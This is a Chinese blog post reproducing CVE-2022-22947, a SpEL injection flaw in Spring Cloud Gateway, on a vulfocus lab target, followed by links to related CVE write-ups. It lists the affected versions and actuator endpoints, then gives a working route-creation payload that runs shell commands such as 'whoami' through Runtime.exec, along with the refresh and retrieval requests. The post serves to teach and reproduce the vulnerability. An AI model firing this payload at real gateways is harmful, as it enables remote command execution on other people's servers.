spring 命令执行 (CVE-2022-22947)

最新推荐文章于 2024-06-03 11:16:48 发布
最新推荐文章于 2024-06-03 11:16:48 发布
阅读量571 收藏
点赞数 1
文章标签: spring spring cloud java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46420165/article/details/128241252
版权

原文地址
Spring Cloud Gateway 是 Spring Cloud 下的一个项目,该项目是基于 Spring 5.0、Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效、统一的 API 路由管理方式。

影响范围

Spring Cloud Gateway 3.1.x < 3.1.1

Spring Cloud Gateway 3.0.x < 3.0.7

原理

Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。

Spring cloud GateWay的actuator相关端点:

  • 获取所有路由:Get请求:http://localhost:xxxx/actuator/gateway/routes/

  • 添加路由:POST请求:http://localhost:xxxx/actuator/gateway/routes/路由编号

  • 删除路由:DELETE请求:http://localhost:xxxx/actuator/gateway/routes/路由编号

  • 获取指定路由:GET请求:http://localhost:xxxx/actuator/gateway/routes/路由编号

  • 刷新路由:POST请求:http://localhost:xxxx/actuator/gateway/refresh

    其中,调用添加路由的端点时,可以向路由中加入filters,过滤器的值允许为spEL表达式,且会解析这个spEL表达式。可以通过构造spEL进行远程命令执行。构造的filters可以直接利用gateway自带的AddResponseHeader,将spEL的执行结果添加到响应头中,直接通过响应头进行查看。

复现

利用vulfocus在线靶场来进行漏洞复现 靶场地址

构造payload

id 字段指定新路由的名称,必须全局唯一;
filters字段给这条路由指定若干个过滤器。过滤器用于对请求和响应进行修改;
name 字段指定要添加的过滤器,这里添加了一个 AddResponseHeader 过滤器,用于 gateway 给客户端返回响应之前添加一个响应头;
args.name 字段指定要添加的响应头;
args.value 字段指定响应头的值。这里的值是要执行的 SPEL 表达式,用于执行 “任意例如whoami” 命令。注意需要将命令输出结尾的换行符去掉,否则过滤器执行时会抛出异常说「响应头的值不能以 \r 或 \n 结尾」;
uri 字段指定将客户端请求转发到 http://example.com。
payload示例
{
  "id": "----自定义一个路由id--------",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "--------此处构造spEL-------------"
    }
  }],
  "uri": "http://localhost:8088------随意写个地址",
  "predicates": ["Path=/aaa/**--------随意写个匹配规则"]
}

步骤:

  1. 按照上面的示例payload,通过构造spEL,在spEL中使用 Runtime 类执行命令。
  2. 调用刷新路由的端点,刷新gateway中的路由
  3. 调用获取指定路由的端点,使路由的spEL表达式被解析执行

因为 filters 中的value类型为字符串,所以如果想在获取指定路由时,通过响应看到命令执行结果,那么可以将spEL表达式通过new String(xxxxx)构造成返回String字符串的返回值。
例如:#{new String(T(java.lang.Runtime).getRuntime().exec(new String[]{\"/bin/sh\",\"-c\", \"ls -l /"}).toString())}

POST /actuator/gateway/routes/test

{
      "id": "test",
      "filters": [{
                   "name": "AddResponseHeader",
                           "args": {
                                    "name": "Result",
                                    "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
                                   }
                 }],
      "uri": "http://example.com"
}

发送到返回包 repeater

POST /actuator/gateway/refresh


GET /actuator/env

栖迟!
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947
Fiverya的博客
01-10 1050
CVE-2022-22947
Spring Cloud Gateway远程命令执行漏洞(CVE-2022-22947
Bird&Bird
03-13 595
使用Spring Cloud Gateway的应用程序在Actuator端点启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可以恶意创建允许在远程主机上执行任意远程执行的请求。 当攻击者可以访问actuator API时,就可以利用该漏洞执行任意命令
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行CVE-2022-22947
god_Zeo的安全博客
03-06 4998
0x01 Spring Cloud Gateway是基于Spring Framework 和 Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。华为云提醒使用Spring Cloud Gateway的用户及时安排自检并做好安全加固。 参考链接: CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability CVE-2022-22947: SPEL CASTING AND EVIL
Spring boot命令执行 (CVE-2022-22947)漏洞复现和相关利用工具
XXokok的博客
11-29 520
Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令
[Vulfocus解题系列]spring 命令执行CVE-2022-22947
最新发布
00勇士王子的博客
06-03 929
使用docker部署环境。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
CVE-2022-22965 GUItools单个图形化利用工具
04-06
CVE-2010-1622中曾出现由于参数自动绑定机制导致的问题, 此前通过黑名单的方式修复了该漏洞,但是 JDK9之后引入了 Module,使得可以通过 getModule 绕过前者的黑名单限制,最后导致远程代码执行
Spring-CVE-2022-22947复现
lionwerson的博客
03-26 1305
Spring-CVE-2022-22947-POC 简介: Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。 漏洞环境: docker run -d -p 8080:8080 vulhub/spring-cloud-gateway:3.1.0 访问8080端口: POC: import requests import json
Spring框架漏洞解析之二(CVE-2022-22965、CVE-2022-22947CVE-2018-1273、CVE-2018-1270)
Continuejww的博客
10-20 462
CVE-2022-22965是在Java 9的环境下,引入了class.module.classLoader,导致了CVE-2010-1622漏洞补丁的绕过,JDK9中存在可以绕过黑名单禁用的类,导致了这个漏洞。Spring Cloud Gateway 提供了一个库,用于在 Spring WebFlux 之上构建 API 网关。
CVE-2022-22947 Spring Cloud Gateway RCE漏洞复现分析
m0_61506558的博客
09-18 7240
Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露Gateway Actuator端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。(二)漏洞复现。
tomcat7.x远程命令执行CVE-2017-12615)漏洞利用复现
m0_58606546的博客
01-11 3985
一、漏洞前言 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定条件下,攻击者可以利用这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险 二、漏洞名称 CVE-2017-12615-远程代
springboot漏洞(Spring RCE 0day)CVE-2022-22965
GDKbb的博客
03-30 7138
一·漏洞影响排查方法 (一).JDK版本号排查 在业务系统的运行服务器上,执行java -version”命令查看运行的JDK版本,如果版本号小于等于8,则不受漏洞影响 (二).Spring框架使用情况排查 1.如果业务系统项目以war包形式部署,按照如下步骤进行判断。 ⑴解压war包:将war文件的后缀修改成.zip ,解压zip文件 ⑵在解压缩目录下搜索是否存在 spring-beans-.jar 格式的jar文件(例如spring-beans-5.3.16.jar),如存在则说明业务系统使用了spr
Spring框架远程命令执行漏洞复现
xiaoMiao的博客
04-11 7123
Spring框架远程命令执行漏洞docker环境复现 记录篇~
spring代码执行Linux命令,利用Spring Boot 2的三个特性实现远程命令执行
weixin_28728715的博客
05-12 737
序幕Spring Boot框架是当今最流行的基于Java的微服务框架之一,它可以帮助开发人员快速轻松地部署Java应用。Spring Boot专注为开发人员提供友好的工具和便捷的配置,加速开发过程。然而,某些默认的开发设置在缺乏经验的开发人员手中可能会变得很危险。我的这篇文章是基于Michal Stepankin的成果,他研究了在Spring Boot 1.x中如何利用被暴露的Actuator通过...
SpringMessaging命令执行漏洞 cve-2018-1270
whatday的专栏
07-07 2278
漏洞概述 https://pivotal.io/security/cve-2018-1270 STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它是一种在客户端与中转服务端(消息代理Broker)之间进行异步消息传输的简单通用协议,它定义了服务端与客户端之间的格式化文本传输方式。已经在被许多消息中间件与客户端工具所支持。STOMP协议规范:https://stomp.github.io/stomp-specification-1.
使用 Spring Shell 开发 Java 命令行应用
挖坑小队长
12-05 7012
转自:https://www.ibm.com/developerworks/cn/java/spring-shell-application/index.html 提到 Java,大家都会想到 Java 在服务器端应用开发中的使用。实际上,Java命令行应用的开发中也有一席之地。在很多情况下,相对于图形用户界面来说,命令行界面响应速度快,所占用的系统资源少。在与用户进行交互的场景比较单一
CVE-2022-22947
09-05
CVE-2022-22947是一个Spring Cloud Gateway的远程代码执行漏洞。这个漏洞允许攻击者通过构造恶意请求,利用SpEL表达式注入任意代码执行。通过执行恶意代码,攻击者可以获取系统权限并执行任意操作。根据引用中提供的POC,攻击者可以构造特定的请求来利用这个漏洞。 请注意,本回答只是简要介绍了CVE-2022-22947漏洞的基本情况。如果您需要更详细的信息和防范措施,请参考引用提供的GitHub链接以及其他相关资源。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CVE-2022-22947 Spring Cloud Gateway远程代码执行漏洞复现](https://blog.csdn.net/qq_44281295/article/details/126730174)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值